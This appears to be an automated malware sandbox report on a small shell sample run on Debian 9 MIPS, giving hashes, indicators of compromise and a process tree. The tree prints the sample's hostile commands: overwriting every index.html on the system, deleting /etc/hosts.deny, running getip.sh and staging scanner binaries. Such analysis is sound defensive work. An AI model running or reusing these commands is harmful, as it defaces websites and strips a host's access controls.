fcdfe2e840ff01799c632fbe055ac3af46422be04482238c73ceeb594fbb616f

Analysis

max time kernel
2s
platform
debian-9_mips
resource
debian9-mipsbe-20231222-en
resource tags

arch:mipsimage:debian9-mipsbe-20231222-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
22-12-2023 05:35

Target

71feec726591d84cea09c54743a830c9
Size

434B
MD5

71feec726591d84cea09c54743a830c9
SHA1

a16de25b76d2fe61abf71a759c9c54e9fddd76fe
SHA256

fcdfe2e840ff01799c632fbe055ac3af46422be04482238c73ceeb594fbb616f
SHA512

44193fd9716b695ade062061604140aa67a0f4222b5827a2b2bbe23463be629cc4d773b76c08f6db813cac18c5ba7220d486e5e5ca3c9545485456c056a87a25

Score

3^/10

Reads runtime system information 6 IoCs

Reads data from /proc virtual filesystem.

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/nohup.out	nohup

/tmp/71feec726591d84cea09c54743a830c9
/tmp/71feec726591d84cea09c54743a830c9
1⤵
PID:710
- /usr/bin/nohup
  nohup find / -name index.html -exec /bin/cp index.html "{}" ";"
  2⤵
  - Writes file to tmp directory
  PID:712
- /bin/rm
  rm -f /etc/hosts.deny
  2⤵
  PID:713
- /tmp/getip.sh
  ./getip.sh
  2⤵
  PID:714
- /usr/local/sbin/find
  find / -name index.html -exec /bin/cp index.html "{}" ";"
  2⤵
  PID:712
- /usr/local/bin/find
  find / -name index.html -exec /bin/cp index.html "{}" ";"
  2⤵
  PID:712
- /usr/sbin/find
  find / -name index.html -exec /bin/cp index.html "{}" ";"
  2⤵
  PID:712
- /usr/bin/find
  find / -name index.html -exec /bin/cp index.html "{}" ";"
  2⤵
  - Reads runtime system information
  PID:712
- /bin/cp
  cp synscan7 synscan
  2⤵
  - Reads runtime system information
  PID:716
- /bin/cp
  cp w7 w
  2⤵
  - Reads runtime system information
  PID:720
- /bin/cp
  cp l7 l
  2⤵
  - Reads runtime system information
  PID:725
- /bin/cp
  cp s7 s
  2⤵
  - Reads runtime system information
  PID:727
- /bin/cp
  cp randb7 randb
  2⤵
  - Reads runtime system information
  PID:729